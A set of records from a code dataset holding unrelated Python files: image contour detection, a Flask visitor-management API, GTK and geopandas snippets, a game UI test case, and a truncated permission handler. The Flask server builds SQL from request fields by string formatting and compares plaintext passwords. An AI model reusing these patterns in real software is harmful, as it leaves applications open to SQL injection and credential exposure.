[os.path.join(self.__queueDir, x) for x in os.listdir(self.__queueDir)]\n for queue_directory in queue_content:\n clean_up_directory(queue_directory)\n\n\n\n\nif __name__ == \"__main__\":\n Main().run()","sub_path":"CleanQueue.py","file_name":"CleanQueue.py","file_ext":"py","file_size_in_byte":7199,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"162853557","text":"#!/usr/bin/env python\n\nimport argparse\nimport json\nimport urllib2\n\nfrom stevedore import driver\n\n\nif __name__ == '__main__':\n\n parser = argparse.ArgumentParser()\n parser.add_argument(\n 'data_url',\n nargs=1,\n default=None,\n help='An url where to get the metadata',\n )\n\n parsed_args = parser.parse_args()\n\n data = json.loads(urllib2.urlopen(parsed_args.data_url[0]).read()) # nargs=1 yields a one-element list\n\n managers = [] # collect the stevedore driver managers before running them\n run_order = ['disk_driver', 'image_driver', 'boot_driver', 'post_driver']\n\n for driver_name in run_order:\n managers.append(driver.DriverManager(\n namespace='deployagent.drivers.%s' % (driver_name),\n name=data['drivers'][driver_name],\n invoke_on_load=True,\n invoke_args=(data,),\n ))\n\n for mgr in managers:\n mgr.driver.perform_action(data) \n\n\n","sub_path":"run_deploy_agent.py","file_name":"run_deploy_agent.py","file_ext":"py","file_size_in_byte":836,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"574457304","text":"#!/usr/bin/env python\n# -*- coding:utf-8 -*-\n'''\nItem box\n'''\nimport time\nfrom runcenter.enums import EnumPriority,EnumStatus\nfrom runcenter.testcase import debug_run_all,TestCase\nfrom uilib.backpack_page import Backpack_Page\nfrom uilib.hall_page import Hall_Page\nfrom common.common import Common\n\nclass C31033_DFQP_Backpack_Enterpack(TestCase):\n '''\n The item box has no items and no redemption records; click into the item box and the prize-redemption record\n '''\n owner = \"MindyZhang\"\n status = EnumStatus.Design\n priority = EnumPriority.High\n timeout = 5\n def pre_test(self):\n self.common = Common()\n # Initialize the Luadriver\n self.luadriver = self.common.setupdriver()\n # Every test case needs activity pop-ups closed, so this is done here in setup\n self.common.closeactivity_switchserver(self.luadriver, \"预发布\")\n self.hall_page = Hall_Page()\n self.backpack_page = Backpack_Page()\n\n def run_test(self):\n self.start_step(\"等待页面加载完成\")\n self.hall_page.wait_element(\"同步标志\")\n self.start_step(\"进入物品箱页面\")\n time.sleep(2)\n self.hall_page.wait_element(\"物品箱\").click()\n time.sleep(2)\n self.hall_page.screenshot('1.png')\n self.hall_page.wait_element(\"兑奖记录\").click()\n time.sleep(1)\n self.hall_page.screenshot('2.png')\n\n def post_test(self):\n '''\n Clean up the test environment after the test case finishes\n '''\n # self.common.deletefile(self.luadriver)\n self.common.closedriver()\n\n# __qtaf_seq_tests__ = [C032_DFQP_Backpack_Enterpack]\nif __name__ == '__main__':\n # C002_DFQP_Login_GuestLogin = C002_DFQP_Login_GuestLogin()\n # C002_DFQP_Login_GuestLogin.debug_run()\n debug_run_all()\n","sub_path":"常规项目/统一大厅常规checklist/1500/DFQP/src/cases/dfqp_backpack.py","file_name":"dfqp_backpack.py","file_ext":"py","file_size_in_byte":1776,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"406699866","text":"#!/usr/bin/env python3.5\nimport time\ne = time.time()\n\nimport sys\ndebug = False\nfileWrite = True\nif fileWrite:\n fWPath = \"processed/\" + sys.argv[1] + \"-processed.jpg\"\ndisplayProcessed = False\n\nimport cv2\nimport numpy as np\nimport pickle\n\nif debug:\n print (\"imports: \" + str(format(time.time() - e, '.5f')))\n start = time.time()\nserialFile = \"../pickle.txt\"\n\nH, S, L, R, G, B = \"H\", \"S\", \"L\", 
\"R\", \"G\", \"B\" # I hate typing quotes\nl, u = \"l\", \"u\" # Lower & Upper\n\ncc = {H: {l: 50, u: 93},\n S: {l: 25, u: 255},\n L: {l: 34, u: 149},\n R: {l: 64, u: 212},\n G: {l: 206, u: 255},\n B: {l: 126, u: 255}}\n\n# print (cc[H][l], cc[S][l], cc[L][l])\n# print (cc[H][u], cc[S][u], cc[L][u])\n# print (cc[R][l], cc[G][l], cc[B][l])\n# print (cc[R][u], cc[G][u], cc[B][u])\n# a = threshHSL(srcImg, [cc[H][l], cc[S][l], cc[L][l]],\n# [cc[H][u], cc[S][u], cc[L][u]]) # HSL thresh lower/upper\n# if debug:\n# print (\"HSL: \" + str(format(time.time() - start, '.5f')))\n# start = time.time()\n# b = threshRGB(srcImg, [cc[R][l], cc[G][l], cc[B][l]],\n# [cc[R][u], cc[G][u], cc[B][u]]) # RGB lower/upper\n\n# Note: System arguments should take the form of an IP address of the video\n# capture feed\n\n# srcImg = cv2.VideoCapture() # Define srcImg as image/video capture\n#\n# if len(sys.argv) != 2:\n# print(\"Error: specify an URL to connect to\")\n# exit(0)\n#\n# url = sys.argv[1]\n#\n# srcImg.open(\"http://127.0.0.1:8080/stream.wmv\")\n# ret, frameImg = srcImg.read() # Test\n# imgY, imgX, imgChannels = frameImg.shape\n\nsrcImg = cv2.imread(\"/home/solomon/frc/the-deal/pythonCV/RealFullField/\" +\n sys.argv[1] + \".jpg\", 1)\n# print (srcImg.shape)\nif debug:\n print (\"Read image: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n\ndef percentFromResolution(srcImg, yTargetRes, xTargetRes):\n imgY, imgX, imgChannels = srcImg.shape\n modPercentX = float(xTargetRes) / imgX\n modPercentY = float(yTargetRes) / imgY\n return [modPercentY, modPercentX]\n\n\ndef imgScale(toScale, percentX, percentY):\n scaledImg = cv2.resize(toScale, None, fx=percentX, fy=percentY,\n interpolation=cv2.INTER_CUBIC) # MaybeTry INTER_AREA\n return scaledImg\n\n\ndef threshHSL(imgSrc, lower, upper):\n \"\"\"Returns binary mask of image based on HSL bounds\"\"\"\n imgSrcHLS = cv2.cvtColor(imgSrc, cv2.COLOR_BGR2HLS)\n npLower = np.array([lower[0], lower[2], lower[1]]) # Compesate for HLSvsHSL\n npUpper = np.array([upper[0], upper[2], upper[1]])\n tmp = cv2.inRange(imgSrcHLS, npLower, npUpper)\n return tmp\n\n\ndef threshRGB(imgSrc, lower, upper):\n \"\"\"Returns binary mask of image based on RGB bounds\"\"\"\n imgSrcRGB = cv2.cvtColor(imgSrc, cv2.COLOR_BGR2RGB)\n npLower = np.array([lower[0], lower[1], lower[2]])\n npUpper = np.array([upper[0], upper[1], upper[2]])\n tmp = cv2.inRange(imgSrcRGB, npLower, npUpper)\n return tmp\n\n\ndef cvAdd(img1, img2):\n \"\"\"Returns addition of 2 images\"\"\"\n tmp = cv2.add(img1, img2)\n return tmp\n\n\ndef findContours(img):\n \"\"\"Finds contours in image, preferably binary image\"\"\"\n ret, contours, hierarchy = \\\n cv2.findContours(img, cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n return contours, hierarchy\n\nif debug:\n print (\"function defs: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n# srcImg = imgScale(srcImg, percentFromResolution(srcImg, 240, 320)[0],\n# percentFromResolution(srcImg, 240, 320)[1])\nmultiplier = 1\nsrcImg = imgScale(srcImg, percentFromResolution(srcImg,\n srcImg.shape[0]*multiplier,\n srcImg.shape[1]*multiplier)[0],\n percentFromResolution(srcImg,\n srcImg.shape[0]*multiplier,\n srcImg.shape[1]*multiplier)[1])\n# srcImg = cv2.resize(srcImg, None, fx=.5, fy=.5, interpolation=cv2.INTER_CUBIC)\n\nif debug:\n print (\"Scale: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\nsrcImg = cv2.GaussianBlur(srcImg, (5, 5), 5)\nif debug:\n print (\"Blur: \" + str(format(time.time() - start, '.5f')))\n 
start = time.time()\n\na = threshHSL(srcImg, [cc[H][l], cc[S][l], cc[L][l]],\n [cc[H][u], cc[S][u], cc[L][u]]) # HSL thresh lower/upper\nif debug:\n print (\"HSL: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\nb = threshRGB(srcImg, [cc[R][l], cc[G][l], cc[B][l]],\n [cc[R][u], cc[G][u], cc[B][u]]) # RGB lower/upper\nif debug:\n print (\"RGB: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\nc = cvAdd(a, b)\nif debug:\n print (\"Add: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\nd = c\ncontours, hiearchy = findContours(d)\nif debug:\n print (\"Contours: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n\ntmpVar = 0\n\n# while len(contours) > 1: # this inefficient mess finds the biggest contour\n# # (I think)\n# for z in range(0, len(contours)):\n# try:\n# if cv2.contourArea(contours[z]) <= tmpVar:\n# contours.pop(z)\n# except IndexError:\n# break\n# # print (str(tmpVar) + \": \" + str(len(contours)) + \": \" + str(z))\n# tmpVar += 1\n#\n# if debug:\n# print (\"Found biggest: \" + str(format(time.time() - start, '.5f')))\n# start = time.time()\n\n# for x in contours:\n# print (cv2.contourArea(x))\n\n# print(\"\\n\")\n\ncontoursSorted = sorted(contours,\n key=lambda x: cv2.contourArea(x), reverse=True)\n# print (contours[0])\n# print (contoursSorted)\ncontours = contoursSorted[0:5]\n\n\nif debug:\n print (\"Found biggest w/ better algorithm: \" + str(format(time.time() -\n start, '.5f')))\n start = time.time()\n\n\n# rect = cv2.minAreaRect(contours[0])\n# box = cv2.cv.BoxPoints(rect)\n# box = np.int0(box)\n# cv2.drawContours(srcImg, [box], 0, (0, 255, 0), 2)\n#\n# rows, cols = srcImg.shape[:2]\n# [vx, vy, x, y] = cv2.fitLine(contours[0], cv2.cv.CV_DIST_L2, 0, 0.01, 0.01)\n# lefty = int((-x*vy/vx) + y)\n# righty = int(((cols-x)*vy/vx)+y)\n# cv2.line(srcImg, (cols-1, righty), (0, lefty), (255, 0, 0), 2)\n\nhull = cv2.convexHull(contours[0], returnPoints=True)\nif debug:\n print (\"Convex hull: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n(count, _, _) = hull.shape\nhull.ravel()\nhull.shape = (count, 2)\n\n\ntmpVar = 0\nitera = 0\nmaxIter = 256\niii = len(cv2.approxPolyDP(hull, tmpVar, True))\nwhile iii != 4:\n if iii > 4:\n tmpVar += 1\n elif iii < 4:\n tmpVar -= 1\n itera += 1\n if itera >= maxIter:\n break\n iii = len(cv2.approxPolyDP(hull, tmpVar, True))\n\napprox = cv2.approxPolyDP(hull, tmpVar, True)\n\nif debug:\n print (\"Found quadrangle: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n# if debug:\ncv2.drawContours(srcImg, contours, -1, (0, 0, 255), 1)\ncv2.polylines(srcImg, np.int32([hull]), True, (0, 255, 0), 1)\ncv2.drawContours(srcImg, approx, -1, (0, 255, 0), 3)\n\nfor x in range(0, len(approx)):\n # print (x)\n # print (approx[x][0][0])\n cv2.putText(srcImg,\n \" \" + str(x) + \": (\" + str(approx[x][0][0]) +\n \", \" + str(approx[x][0][1]) + \")\",\n (approx[x][0][0], approx[x][0][1]),\n cv2.FONT_HERSHEY_PLAIN, 1, (0, 255, 255), 1)\n\nif debug:\n print (\"Drew image: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\n\ndef imgUntilQ(srcImg):\n cv2.imshow('e', srcImg)\n while True:\n if cv2.waitKey(1) & 0xFF == ord('q'):\n break\n cv2.destroyAllWindows()\n\nif debug:\n print (\"Wrote image: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\nif fileWrite:\n cv2.imwrite(fWPath, srcImg)\n# Starting to calculate stuff for NT publishing.\n# Items to be published:\n# Center of box/contour (maybe avg them)\n# 4 
points\n# Slopes of angles of sides of box\n# Box height\n# Box width\n# Planned output:\n# [center, (p1, p2, p3, p4), (Mp1, Mp2, Mp3, Mp4), (height, width)]\n\n\np1, p2, p3, p4 = [approx[0][0][0], approx[0][0][1]], \\\n [approx[1][0][0], approx[1][0][1]], \\\n [approx[2][0][0], approx[2][0][1]], \\\n [approx[3][0][0], approx[3][0][1]]\nxSize = 0\nySize = 0\npointArr = [p1, p2, p3, p4]\n\nleftPoints = sorted(pointArr)[:2]\nrightPoints = sorted(pointArr)[2:]\ntopPoints = sorted(sorted(pointArr, key=lambda x: x[1])[:2])\nbottomPoints = sorted(sorted(pointArr, key=lambda x: x[1])[2:])\n\nxSize = sorted(pointArr)[-1][0] - sorted(pointArr)[0][0]\nySize = sorted(pointArr, key=lambda x: x[1], reverse=True)[0][1] - \\\n sorted(pointArr, key=lambda x: x[1])[0][1]\n\napproxMoments = cv2.moments(approx)\ncontourMoments = cv2.moments(contours[0])\napproxCentroidY = int(approxMoments['m01']/approxMoments['m00'])\napproxCentroidX = int(approxMoments['m10']/approxMoments['m00'])\ncv2.circle(srcImg, (approxCentroidX, approxCentroidY), 5, (255, 0, 255))\n\n# print (p1, p2, p3, p4)\n\nleftSlope, rightSlope, topSlope, bottomSlope = \\\n format((leftPoints[1][1] - leftPoints[0][1]) /\n float(leftPoints[1][0] - leftPoints[0][0]), '.2f'),\\\n format((rightPoints[1][1] - rightPoints[0][1]) /\n float(rightPoints[1][0] - rightPoints[0][0]), '.2f'),\\\n format((topPoints[1][1] - topPoints[0][1]) /\n float(topPoints[1][0] - topPoints[0][0]), '.2f'),\\\n format((bottomPoints[1][1] - bottomPoints[0][1]) /\n float(bottomPoints[1][0] - bottomPoints[0][0]), '.2f')\n\n# print (leftPoints[1][1], leftPoints[0][1])\n# print (leftPoints[1][0], leftPoints[0][0])\n# print (leftSlope, rightSlope, topSlope, bottomSlope)\n\n\nfinalDict = {}\n\nfinalDict[\"approxCentroidX\"] = int(approxCentroidX)\nfinalDict[\"approxCentroidY\"] = int(approxCentroidY)\n\nfinalDict[\"xSize\"] = int(xSize)\nfinalDict[\"ySize\"] = int(ySize)\n\nfinalDict[\"p1\"] = (int(p1[0]), int(p1[1]))\nfinalDict[\"p2\"] = (int(p2[0]), int(p2[1]))\nfinalDict[\"p3\"] = (int(p3[0]), int(p3[1]))\nfinalDict[\"p4\"] = (int(p4[0]), int(p4[1]))\n\nfinalDict[\"leftSlope\"] = float(leftSlope)\nfinalDict[\"rightSlope\"] = float(rightSlope)\nfinalDict[\"topSlope\"] = float(topSlope)\nfinalDict[\"bottomSlope\"] = float(bottomSlope)\n# print (str(leftSlope) + \", \" + str(rightSlope) + \", \" + str(topSlope) + \", \" +\n# str(bottomSlope))\n\n# Side slopes\nif debug:\n print (\"Made dict: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n\nwith open(serialFile, 'wb') as j:\n # pickle.dump(finalList, j)\n pickle.dump(finalDict, j, 2)\n\nif debug:\n print (\"Dumped pickle: \" + str(format(time.time() - start, '.5f')))\n start = time.time()\n print (\"Total time: \" + str(time.time() - e))\n\nif displayProcessed:\n imgUntilQ(srcImg)\n","sub_path":"pythonCV/mjpgToConvex.py","file_name":"mjpgToConvex.py","file_ext":"py","file_size_in_byte":10822,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"316325678","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Sat Aug 3 16:18:42 2019\n@author: akshay72\n\"\"\"\nimport psycopg2,config_parser\nfrom flask import Flask , request,jsonify\n\nstart_time=\"\"\nend_time=\"\"\n\napp = Flask(__name__)\nparams = config_parser.config(filename='db_config/database.ini', section='postgresql')\nqueries = config_parser.config(filename='db_config/database.ini', section='queries')\n\ntry:\n # connect to the PostgreSQL server\n conn = 
psycopg2.connect(**params)\n cur = conn.cursor()\nexcept psycopg2.DatabaseError as error:\n jsonify(error)\n \n \ndef replace(data):\n if(data is not None):\n return data\n data=None\n return data\n\n\n@app.route('/society_info',methods=['GET','POST'])\ndef society_info():\n try:\n query=queries['suggest_id_name']\n cur.execute(query)\n result=cur.fetchall()\n return jsonify(result)\n except psycopg2.DatabaseError as error:\n errors={'society info':False,\n 'error':(error)\n }\n return str(errors)\n \n\n \n \n@app.route('/get_id',methods=['GET','POST'])\ndef get_id():\n try:\n regd_no=request.form['regd_no']\n query_society_id=queries['get_society_id']\n query=query_society_id.format(regd_no)\n cur.execute(query)\n conn.commit()\n return jsonify(cur.fetchone())\n except psycopg2.DatabaseError as error:\n errors={'registeration':False,\n 'error':(error)\n }\n return str(errors)\n\n \n@app.route('/society_register', methods=['GET','POST'])\ndef society_register():\n try:\n #society details\n regd_no=request.form['regd_no']\n building_name=request.form['society_name']\n building_address=request.form['society_address']\n total_buildings=request.form['total_buildings']\n total_flats=request.form['total_flats']\n society_register_query=queries['society_register']\n query=society_register_query.format(str(regd_no),str(building_name),str(building_address),int(total_buildings),int(total_flats))\n cur.execute(query)\n conn.commit()\n #first user details\n return jsonify(\"society registered succesfully\")\n except psycopg2.DatabaseError as error:\n errors={'society registeration':False,\n 'error':(error)\n }\n return str(errors)\n \ndef generate(first,last):\n return first+last\n\n#staff Registeration (staff may be watchman or secretary)\n@app.route('/user/register', methods=['GET','POST'])\ndef register():\n create_user=queries['create_user']\n try:\n #username=request.form['username']\n email=request.form['email']\n first_name=request.form['first_name']\n middle_name=request.form['middle_name']\n last_name=request.form['last_name']\n password=request.form['password']\n society_id=request.form['society_id']\n isadmin=request.form['isadmin']\n username=generate(first_name,last_name)\n postgres_insert_query=create_user.format(str(username),str(email),str(first_name),str(middle_name),str(last_name),str(password),str(society_id),str(isadmin))\n cur.execute(postgres_insert_query)\n conn.commit()\n return \"User registered Succesfully\"\n except psycopg2.DatabaseError as error:\n errors={'registeration':False,\n 'error':(error)\n }\n return str(errors)\n\n#staff Login\n@app.route('/user/login',methods=['GET','POST'])\ndef login():\n validate_query=queries['validate_user']\n \n username=request.form['email']\n password=request.form['password']\n postgres_user_login_query=validate_query.format(username,password)\n cur.execute(postgres_user_login_query)\n return jsonify(cur.fetchone())\n\n# visitor entry from staff\n@app.route('/insertVisitor',methods=['GET','POST'])\ndef visitor_entry():\n insert_visitor=queries['insert_visitor']\n try:\n first_name=request.form['first_name']\n contact_number=request.form['contact_number']\n entry_time=request.form['entry_time']\n #entry_time=datetime.datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\")\n flat_info=request.form['visiting_flat_no']\n last_name=replace(request.form['last_name'])\n #middle_name=replace(request.form['middle_name'])\n staff_name=request.form['staff_id']\n visit_reason=request.form['visit_reason']\n society_id=request.form['society_id']\n 
postgres_visitor_insert_query=insert_visitor.format(str(first_name),str(last_name),int(contact_number),str(entry_time),str(flat_info),int(staff_name),str(visit_reason),int(society_id))\n cur.execute(postgres_visitor_insert_query)\n conn.commit()\n success=True\n return jsonify(success)\n\n except psycopg2.DatabaseError as error:\n errors={'visitor_entry':False,\n 'error':(error)\n }\n return str(errors)\n # middle_name ,contact_number ,flat_info\n\n@app.route('/update_exit',methods=['GET','POST'])\ndef update_exit():\n #update_exit=queries['update_exit']\n visitor_id=request.form['id']\n exit_time=request.form['exit_time']\n try:\n update_query='''update visitor_management_schema.visitor_table set exit_time='{}' where id={}'''.format(exit_time,visitor_id)\n cur.execute(update_query)\n conn.commit()\n success=True\n except:\n success=False\n return jsonify(success)\n \n\n# admin access\n@app.route('/dashboard_count',methods=['GET','POST'])\ndef dashboard_data():\n non_admin_user=queries['non_admin_user_count']\n total_visitor_count=queries['total_visitor_count']\n society_id=request.form['society_id']\n postgres_visitor_count=total_visitor_count.format(society_id)\n postgres_watchman_count=non_admin_user.format(society_id)\n cur.execute(postgres_watchman_count)\n watchman_count=cur.fetchone()\n cur.execute(postgres_visitor_count)\n \n visitor_count=cur.fetchone()\n return jsonify({'watchman_count':watchman_count[0],'visitor_count':visitor_count[0]})\n\n#admin access\n@app.route('/dashboard_watchman',methods=['GET','POST'])\ndef dashboard_watchman():\n admin_user=queries['non_admin_user']\n society_id=request.form['society_id']\n postgres_admin=admin_user.format(society_id)\n cur.execute(postgres_admin)\n user=cur.fetchall()\n return jsonify({'user':user})\n\n@app.route('/dashboard_visitor',methods=['GET','POST'])\ndef dashboard_visitor():\n all_visitor_details=queries['all_visitor_details']\n society_id=request.form['society_id']\n postgres_watchman=all_visitor_details.format(society_id)\n cur.execute(postgres_watchman)\n user=cur.fetchall()\n return jsonify({'user':(user)})\n \n@app.route('/',methods=['GET','POST'])\ndef hello_worlds():\n return \"
\"\n \n\n@app.route('/mayur',methods=['GET','POST'])\ndef hello_world():\n return \"
Hello World! This is Mayur mia
\"\n\n@app.route('/mia',methods=['GET','POST'])\ndef hello():\n return \"Hello World! This is Akshay mia\"\n\n@app.route('/raj',methods=['GET','POST'])\ndef hellos():\n return \"Hello World! This is Raj mia\"\n\n@app.route('/about',methods=['GET','POST'])\ndef about():\n return jsonify({'Company':'Visitor Management',\n 'Dev center':'Team Foundation',\n 'version':'heroku test development'})\n\n@app.route('/id',methods=['GET','POST'])\ndef helloid():\n cur.execute('select * from visitor_management.test;')\n result=cur.fetchall()\n return jsonify(result) \n\n\n","sub_path":"server.py","file_name":"server.py","file_ext":"py","file_size_in_byte":7634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"126258304","text":"import gi\ngi.require_version('Gtk', '3.0')\n#gi.require_version('Granite', '1.0')\nfrom gi.repository import Gtk\n\nclass FormatBar(Gtk.Box):\n\n\tdef __init__(self):\n\n\t\tGtk.Box.__init__(self)\n\t\tGtk.StyleContext.add_class(self.get_style_context(), \"linked\")\n\n\t\t#bold\n\t\tself.bold = Gtk.ToggleButton()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-text-bold-symbolic\", Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.bold.add(image)\n\t\tself.bold.set_tooltip_text(\"Bold\")\n\n\t\t#Italic\n\t\tself.italic = Gtk.ToggleButton()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-text-italic-symbolic\", Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.italic.add(image)\n\t\tself.italic.set_tooltip_text(\"Italic\")\n\n\t\t#Underline\n\t\tself.underline = Gtk.ToggleButton()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-text-underline-symbolic\", Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.underline.add(image)\n\t\tself.underline.set_tooltip_text(\"Underline\")\n\n\t\t#ubuntu font\n\t\tself.ubuntu = Gtk.ToggleButton.new_with_label(\"Ubuntu Mono\")\n\n\t\t#font size\n\t\t#self.size = Gtk.Entry()\n\t\t#self.size.set_text(str(12))\n\t\t#self.size.set_max_width_chars(4)\n\t\t#self.size.set_width_chars(4)\n\t\t#self.size.set_max_length(2)\n\n\n\t\t#justification\n\t\tself.just_left = Gtk.Button()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-justify-left-symbolic\",Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.just_left.add(image)\n\t\tself.just_left.set_tooltip_text(\"Left Justification (Select the entire line)\")\n\n\t\tself.just_center = Gtk.Button()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-justify-center-symbolic\",Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.just_center.add(image)\n\t\tself.just_center.set_tooltip_text(\"Center Justification (Select the entire line)\")\n\n\t\tself.just_right = Gtk.Button()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-justify-right-symbolic\",Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.just_right.add(image)\n\t\tself.just_left.set_tooltip_text(\"Left Justification (Select the entire line)\")\n\n\t\tself.just_fill = Gtk.Button()\n\t\timage = Gtk.Image.new_from_icon_name(\"format-justify-fill-symbolic\",Gtk.IconSize.MENU)\n\t\timage.show()\n\t\tself.just_fill.add(image)\n\t\tself.just_fill.set_tooltip_text(\"Fill Justification (Select the entire line)\")\n\t\t\n\n\n\t\tself.title = Gtk.Button.new_with_label(\"Title\")\n\n\t\tself.header = Gtk.Button.new_with_label(\"Header\")\n\n\t\tself.buttons = {}\n\t\tself.buttons['bold'] = self.bold\n\t\tself.buttons['italic'] = self.italic\n\t\tself.buttons['underline'] = self.underline\n\t\tself.buttons['ubuntu'] = self.ubuntu\n\t\t#self.buttons['just_left'] = self.just_left\n\t\t#self.buttons['just_right'] = 
self.just_right\n\t\t#self.buttons['just_center'] = self.just_center\n\t\t#self.buttons['just_fill'] = self.just_fill\n\t\t#self.buttons['size'] = self.size\n\n\t\tself.pack_end(self.header,False,False,0)\n\t\tself.pack_end(self.title,False,False,0)\n\t\tself.pack_end(self.just_fill,False,False,0)\n\t\tself.pack_end(self.just_right, False, False,0)\n\t\tself.pack_end(self.just_center, False, False,0)\n\t\tself.pack_end(self.just_left, False, False,0)\n\t\tself.pack_end(self.ubuntu,False,False,0)\n\t\tself.pack_end(self.underline,False,False,0)\n\t\tself.pack_end(self.italic,False,False,0)\n\t\tself.pack_end(self.bold,False,False,0)","sub_path":"format_toolbar.py","file_name":"format_toolbar.py","file_ext":"py","file_size_in_byte":3137,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"417289313","text":"import gtk\nfrom grafeo.config import Paths\n\nclass MainWindow(gtk.Window):\n def __init__(self):\n gtk.Window.__init__(self)\n\n self.set_title('Grafeo')\n self.set_size_request(600, 400)\n self.set_default_size(600, 400)\n self.set_icon_from_file(Paths.get_img_filename('grafeo.svg'))\n\n builder = gtk.Builder()\n builder.add_from_file(Paths.get_gtk_ui_filename('MainVBox.ui'))\n\n self.mainVBox = builder.get_object('mainVBox')\n\n self.add(self.mainVBox)\n","sub_path":"Projects/grafeo_archive/grafeo_20100227_python/grafeo/ui/gtk/MainWindow.py","file_name":"MainWindow.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"241025618","text":"def outer(add):\r\n print(\"Welcome User\")\r\n pin = input(\"Enter your PIN: \")\r\n if pin == \"1234\":\r\n print(\"Welcome Ram\")\r\n else:\r\n print(\"Wrong PIN\")\r\n\r\n return add\r\n\r\n\r\n@outer\r\ndef caller():\r\n total_bal = 0\r\n amount = int(input(\"Enter amount you want to withdraw : \"))\r\n total_bal += amount\r\n\r\ncaller()\r\n","sub_path":"05-Functions/10-UsingDecorators.py","file_name":"10-UsingDecorators.py","file_ext":"py","file_size_in_byte":339,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"549362363","text":"import pandas as pd\nimport numpy as np\nimport geopandas as gpd\n\n# Import Denver faces, check extent and CRS\nfaces = gpd.read_file(\n \"denver_tiger/tl_2017_08031_faces/tl_2017_08031_faces.shp\")\nprint('FACES DATA:')\nprint('Extent: ', faces.total_bounds)\nprint('CRS: ', faces.crs)\n\n# Import Denver addresses, check extent and CRS\naddresses = gpd.read_file(\n \"den_addresses/addresses.shp\")\nprint('\\nADDRESS DATA:')\nprint('Extent: ', addresses.total_bounds)\nprint('CRS: ', addresses.crs)\nprint(addresses.shape)\n\n# Reproject address data\nadd_reproj = addresses.to_crs({'init': 'epsg:4269'})\n\n# Points within blocks\njoined_data = gpd.sjoin(add_reproj,\n faces,\n how=\"inner\",\n op='intersects')\ndf = joined_data[['PREDIRECTI','STREET_NAM','POSTTYPE']]\ndf = df.apply(lambda row: None if row.isnull().all() else ' '.join(row.dropna()), axis=1)\njoined_data.loc[:,'MAF_NAME'] = df\njoined_data.loc[:,'BLKID'] = (joined_data['STATEFP10'] + joined_data['COUNTYFP10'] + joined_data['TRACTCE10'] + joined_data['BLOCKCE10']).astype(str)\njoined_data = joined_data[['LATITUDE', 'LONGITUDE', 'MAF_NAME', 
'BLKID']]\nprint(joined_data.shape)\nprint(joined_data.head())\njoined_data.to_csv('den_addresses.csv')\n","sub_path":"add_join.py","file_name":"add_join.py","file_ext":"py","file_size_in_byte":1259,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"} +{"seq_id":"652795479","text":"#!/usr/bin/env python\n# -*- encoding:utf-8 -*-\n\nimport json\nimport time\nimport hashlib\nimport traceback\nimport cPickle as pickle\nfrom bson import ObjectId\n\nfrom core.web import HandlerBase, OpenHandlerBase\nfrom framework.mvc.web.requesthandler import RequestHandler as OpenRequestHandler\nfrom core.platform.user import UserManage, sign as UserSign\n\nfrom framework.mvc.web import url\nfrom framework.data.mongo.utils import json2ObjectId\nfrom framework.data import metadb as mdb,sys_db\nfrom framework.web.paging import Paging, skip\n\nfrom settings import settings\n\nclass Result(dict):\n pass\n\ndef make_msg(code, msg='成功', data={}):\n status = True if code == 200 else False\n return Result({'status': status, 'statusCode': code, 'message': msg, 'data': data})\n\nclass Permission(object):\n\n def get(self, handler, option, _querys=None):\n self.handler = handler\n if _querys is None:\n _querys = json.loads(handler.get_argument('querys'))\n\n system_id = handler.get_argument('system_id', None)\n self.user_api = UserManage()\n\n querys = []\n for item in _querys:\n if item.get('fields'):\n item = item['fields']\n querys.append(item)\n\n querys = filter_from_system(self.user_api, querys, system_id)\n\n if not querys:\n return self.handler.json({})\n\n if option == 'has':\n return self._has(querys)\n\n elif option == 'getnames':\n return self._get_names(querys)\n\n elif option == 'get':\n return self._get(querys)\n\n elif option == 'getall':\n return self._get_all(querys)\n\n elif option == 'allow':\n return self._allow(querys)\n\n elif option == 'deny':\n return self._deny(querys)\n\n elif option == 'update':\n return self._update(querys)\n\n elif option == 'getmetadata':\n return self._get_metadata(querys)\n\n elif option == 'setmetadata':\n return self._set_metadata(querys)\n\n def _get_names(self, querys):\n results = {} # keyed by oid; a list cannot be indexed by the oid string\n\n for query in querys:\n\n oid = query['oid']\n\n try:\n mongoid = ObjectId(oid)\n except:\n continue\n\n if mdb.page.find({'_id': mongoid}).count() == 1:\n results[oid] = {'visit': '访问'}\n elif mdb.object.find({'_id': mongoid}).count() == 1:\n results[oid] = 